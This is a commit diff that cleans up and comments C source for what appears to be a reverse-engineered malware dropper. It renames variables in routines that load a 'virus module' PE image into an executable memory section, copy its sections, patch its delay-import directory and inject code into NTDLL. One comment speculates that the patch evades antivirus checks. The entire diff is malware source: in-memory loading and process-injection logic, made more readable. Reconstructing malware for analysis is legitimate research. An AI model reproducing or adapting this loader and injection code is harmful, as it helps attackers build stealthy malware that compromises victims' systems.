Clean up LoadVirusModuleSection et als

Rename some key variables/restructure LoadVirusModuleSection.
Make LoadAndInjectVirus more readable.
Restructure and comment BLOCK4_CopyDataIntoMapView.
Comment on logic in BLOCK4_LoadVirusModuleInfo( some of this is extraneous ).

Dropper/CodeBlock.c

@@ -192,19 +192,18 @@ __declspec(naked) void BLOCK4_memcpy(void *pDestination, const void *pSource, un
 // 99% (C) CODE MATCH
 void BLOCK4_CopyDataIntoMapView(PVOID pVirusModule, PIMAGE_NT_HEADERS pImageNT, LPVOID pMapViewOfFile)
 {
-	INT32 dwNumberOfSections; // [sp+0h] [bp-Ch]@1
-	PIMAGE_SECTION_HEADER pImageSections; // [sp+4h] [bp-8h]@1
-	INT32 dwCurrentSection; // [sp+8h] [bp-4h]@1
-
-	dwNumberOfSections = pImageNT->FileHeader.NumberOfSections;
+	// Copy them headers first
 	BLOCK4_memcpy(pMapViewOfFile, pVirusModule, pImageNT->OptionalHeader.SizeOfHeaders);
-	pImageSections = (PIMAGE_SECTION_HEADER)((DWORD)pImageNT + pImageNT->FileHeader.SizeOfOptionalHeader + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD));
+
+	PIMAGE_SECTION_HEADER pCurrSection = (PIMAGE_SECTION_HEADER)((DWORD)pImageNT + pImageNT->FileHeader.SizeOfOptionalHeader + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD));
 
 	// Copy section by section
-	for(dwCurrentSection = 0; dwCurrentSection < dwNumberOfSections; dwCurrentSection++, pImageSections++)
+	INT32 dwCurrentSection;
+	INT32 dwNumberOfSections = pImageNT->FileHeader.NumberOfSections;
+	for(dwCurrentSection = 0; dwCurrentSection < dwNumberOfSections; dwCurrentSection++, pCurrSection++)
 	{
-		if(pImageSections->SizeOfRawData) // If the section VirtualSize is valid copy the entire section
-			BLOCK4_memcpy((void *)((DWORD)pMapViewOfFile + pImageSections->VirtualAddress), (const void *)((DWORD)pVirusModule + pImageSections->PointerToRawData), pImageSections->SizeOfRawData);
+		if(pCurrSection->SizeOfRawData) // If the section VirtualSize is valid copy the entire section
+			BLOCK4_memcpy((void *)((DWORD)pMapViewOfFile + pCurrSection->VirtualAddress), (const void *)((DWORD)pVirusModule + pCurrSection->PointerToRawData), pCurrSection->SizeOfRawData);
 	}
 }
 
@@ -246,20 +245,26 @@ INT32 BLOCK4_LoadVirusModuleInfo(PHARDCODED_ADDRESSES pHardAddrs, GENERAL_INFO_B
 	HANDLE hSectionHandle; // [sp+14h] [bp-8h]@5
 	PIMAGE_DOS_HEADER pImageDOS; // [sp+18h] [bp-4h]@1
 
-	sInfoBlock->MappedAddress = 0;
+	sInfoBlock->MappedAddress = 0; // Null out that bitch
+
 	pImageDOS = (PIMAGE_DOS_HEADER)pVirusModule;
 
-	if(((PIMAGE_DOS_HEADER)pVirusModule)->e_magic != MZ_HEADER) return -2;
+	// Not a .exe
+	if(((PIMAGE_DOS_HEADER)pVirusModule)->e_magic != MZ_HEADER)
+		return -2;
 
+	// Not PE
 	pImageNT = (PIMAGE_NT_HEADERS)((DWORD)pVirusModule + pImageDOS->e_lfanew);
-	if(pImageNT->Signature != PE_HEADER) return -2;
+	if(pImageNT->Signature != PE_HEADER)
+		return -2;
 
 	liMaximumSize.LowPart  = pImageNT->OptionalHeader.SizeOfImage; // 0x00006000
 	liMaximumSize.HighPart = 0;
 
 	// ZwCreateSection(..., 0xF001F, 0, ..., 64, 0x8000000, 0)
 	iStatus = pHardAddrs->ZwCreateSection(&hSectionHandle, SECTION_ALL_ACCESS, 0, &liMaximumSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, 0);
-	if(iStatus != STATUS_SUCCESS) return -11;
+	if(iStatus != STATUS_SUCCESS)
+		return -11;
 
 	pMapViewOfFile = pHardAddrs->MapViewOfFile(hSectionHandle, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
 	if(!pMapViewOfFile)
@@ -269,6 +274,7 @@ INT32 BLOCK4_LoadVirusModuleInfo(PHARDCODED_ADDRESSES pHardAddrs, GENERAL_INFO_B
 	}
 
 	sInfoBlock->MappedAddress = hSectionHandle;
+
 	BLOCK4_CopyDataIntoMapView(pVirusModule, pImageNT, pMapViewOfFile);
 	BLOCK4_CopyPEHeaderInfo(sInfoBlock, pImageNT, iVirusModuleSize);
 

Dropper/MemorySections.c

@@ -23,38 +23,43 @@ INT32 LoadVirusModuleSection(HANDLE hHandle, PGENERAL_INFO_BLOCK sInfoBlock, PVO
 	HANDLE hMapHandle; // [sp+4h] [bp-28h]@1
 	PVOID pVirusImageBase; // [sp+8h] [bp-24h]@3
 	PIMAGE_NT_HEADERS pImageNT; // [sp+Ch] [bp-20h]@6
-	INT32 iSectionPointer; // [sp+10h] [bp-1Ch]@1
-	PVOID pBaseAddr1; // [sp+14h] [bp-18h]@1
 	PIMAGE_DOS_HEADER pImageDOS; // [sp+18h] [bp-14h]@3
-	UINT32 iSectionsSize; // [sp+1Ch] [bp-10h]@1
-	PVOID pBaseAddr2; // [sp+20h] [bp-Ch]@1
 	PVIRUS_MODULE_BLOCKS_HEADER sVirusModuleBlocksHeader; // [sp+24h] [bp-8h]@3
-	INT32 iOpenMapViewFailed; // [sp+28h] [bp-4h]@1
 
-	pBaseAddr1      = 0;
-	pBaseAddr2      = 0;
+	PVOID pCurrAddr = 0;
+	PVOID pBaseAddr = 0;
 
-	iSectionPointer = 0;
-	iSectionsSize   = sizeof(VIRUS_MODULE_BLOCKS_HEADER) + pUnknownSegmentSize + pVirusModuleSize;
+	INT32 iSectionPointer  = 0;
+	UINT32 iSectionsSize   = sizeof(VIRUS_MODULE_BLOCKS_HEADER) + pUnknownSegmentSize + pVirusModuleSize;
 
-	iOpenMapViewFailed = SharedMapViewOfSection(hHandle, iSectionsSize, &hMapHandle, &pBaseAddr1, &pBaseAddr2);
-	if(iOpenMapViewFailed) return iOpenMapViewFailed;
+	INT32 iOpenMapViewFailed = SharedMapViewOfSection(hHandle, iSectionsSize, &hMapHandle, &pCurrAddr, &pBaseAddr);
+	if(iOpenMapViewFailed)
+		return iOpenMapViewFailed;
 
-	sVirusModuleBlocksHeader = (PVIRUS_MODULE_BLOCKS_HEADER)pBaseAddr1;
-	pBaseAddr1               = (PVOID)((DWORD)pBaseAddr1 + sizeof(VIRUS_MODULE_BLOCKS_HEADER));
+	sVirusModuleBlocksHeader = (PVIRUS_MODULE_BLOCKS_HEADER)pBaseAddr;
+	pCurrAddr                = (PVOID)((DWORD)pCurrAddr + sizeof(VIRUS_MODULE_BLOCKS_HEADER));
+
+	// Don't overwrite the header
 	iSectionPointer          = sizeof(VIRUS_MODULE_BLOCKS_HEADER);
 
-	CopySegmentIntoSections(&pBaseAddr1, pBaseAddr2, &iSectionPointer, &sVirusModuleBlocksHeader->UnknownSegment, pUnknownSegment, pUnknownSegmentSize);
-	pVirusImageBase = pBaseAddr1;
+	CopySegmentIntoSections(&pCurrAddr, pBaseAddr, &iSectionPointer, &sVirusModuleBlocksHeader->UnknownSegment, pUnknownSegment, pUnknownSegmentSize);
+	pVirusImageBase = pCurrAddr;
 
-	CopySegmentIntoSections(&pBaseAddr1, pBaseAddr2, &iSectionPointer, &sVirusModuleBlocksHeader->VirusModuleSegment, pVirusModule, pVirusModuleSize);
+	CopySegmentIntoSections(&pCurrAddr, pBaseAddr, &iSectionPointer, &sVirusModuleBlocksHeader->VirusModuleSegment, pVirusModule, pVirusModuleSize);
 	pImageDOS = (PIMAGE_DOS_HEADER)pVirusImageBase;
 
+	// if virusmodule has "MZ" magic for .exe and virus is within size bounds
 	if((UINT32)pVirusModuleSize >= 0x1000 &&
 	   pImageDOS->e_magic == MZ_HEADER &&
 	   pImageDOS->e_lfanew + sizeof(IMAGE_OPTIONAL_HEADER) + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD) < (UINT32)pVirusModuleSize) // (UINT32 *)pImageDOS[15] + 248 -> Section ".text"
 	{
 		pImageNT = (PIMAGE_NT_HEADERS)((DWORD)pVirusImageBase + pImageDOS->e_lfanew);
+
+		// According to the below references, each entry in the delay import table is 32 bits
+		//  so what the actual fuck is going on here. I suppose delayed injection would be a good way
+		//  of dodging an AV's runtime check, as the virus is loaded into memory as-needed
+		// https://msdn.microsoft.com/en-us/library/windows/desktop/ms680305(v=vs.85).aspx
+		// http://svn.wildfiregames.com/docs/structImgDelayDescr.html
 		if(pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].Size == 72)
 			pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].Size = 64; // Change Delay Import Directory Size
 	}
@@ -64,9 +69,9 @@ INT32 LoadVirusModuleSection(HANDLE hHandle, PGENERAL_INFO_BLOCK sInfoBlock, PVO
 	sVirusModuleBlocksHeader->LibraryExecuteEntryNumber = iExecEntryNumber;
 	sVirusModuleBlocksHeader->VirusModulePointer        = 0;
 
-	*pOutSection = pBaseAddr2;
+	*pOutSection = pBaseAddr;
 
-	g_hardAddrs.UnmapViewOfFile(sVirusModuleBlocksHeader); // Unmap pBaseAddr1 -> same copy present in pBaseAddr2
+	g_hardAddrs.UnmapViewOfFile(sVirusModuleBlocksHeader); // Unmap pCurrAddr -> same copy present in pBaseAddr
 	g_hardAddrs.ZwClose(hMapHandle);
 
 	return 0;
@@ -79,18 +84,19 @@ INT32 LoadAndInjectVirus(PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader, PVIRUS_MO
 	HANDLE hMappedAddress; // [sp+4h] [bp-8Ch]@7
 	INT32 iResult; // [sp+8h] [bp-88h]@1
 	PHARDCODED_ADDRESSES pHardAddrs; // [sp+Ch] [bp-84h]@1
-	GENERAL_INFO_BLOCK sInfoBlockCopy; // [sp+10h] [bp-80h]@1
 
+	GENERAL_INFO_BLOCK sInfoBlockCopy;
 	__memcpy(&sInfoBlockCopy, sInfoBlock, sizeof(GENERAL_INFO_BLOCK)); // Copy the information
 
 	sInfoBlockCopy.OriginalAddress ^= XADDR_KEY; // Get the original address of the variable sInfoBlock
 	sInfoBlockCopy.UnknownZero0     = 0;
 
-	// Point to the first block of assembly in the section
+	// Point to g_hardAddrs in memory
 	pHardAddrs = (PHARDCODED_ADDRESSES)(sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(&g_hardAddrs, __ASM_BLOCK1_0));
 
 	iResult = BLOCK4_LoadVirusModuleInfo(pHardAddrs, &sInfoBlockCopy, (PVOID)sVirusModuleBlocksHeader->VirusModuleSegment.SegmentAddress, sVirusModuleBlocksHeader->VirusModuleSegment.SegmentSize);
-	if(iResult) return iResult
+	if(iResult)
+		return iResult
 
 	if(BLOCK4_InjectCodeIntoNTDLL(sASMCodeBlocksHeader, pHardAddrs))
 		return -4;
@@ -205,9 +211,11 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi
 	// Decrypt the Kernel32's and NTDLL's function names
 	if(bSetup && DecodeEncryptedModuleNames() == FALSE) return -12;
 
+	// Last 4 arguments seem to have been mangled, as -1 is a nonsensical index.
 	iResult = LoadVirusModuleSection(GetCurrentProcess(), &sInfoBlock, pVirusModule, iVirusModuleSize, -1, NULL, 0, &s_virusBlocksPTR);
 	if(iResult) return iResult;
 
+	// One-time
 	if(bSetup)
 	{
 		iResult = LoadCodeSection(GetCurrentProcess(), s_virusBlocksPTR, &s_codeBlockPTR, &s_ASMCodeBlocksPTR);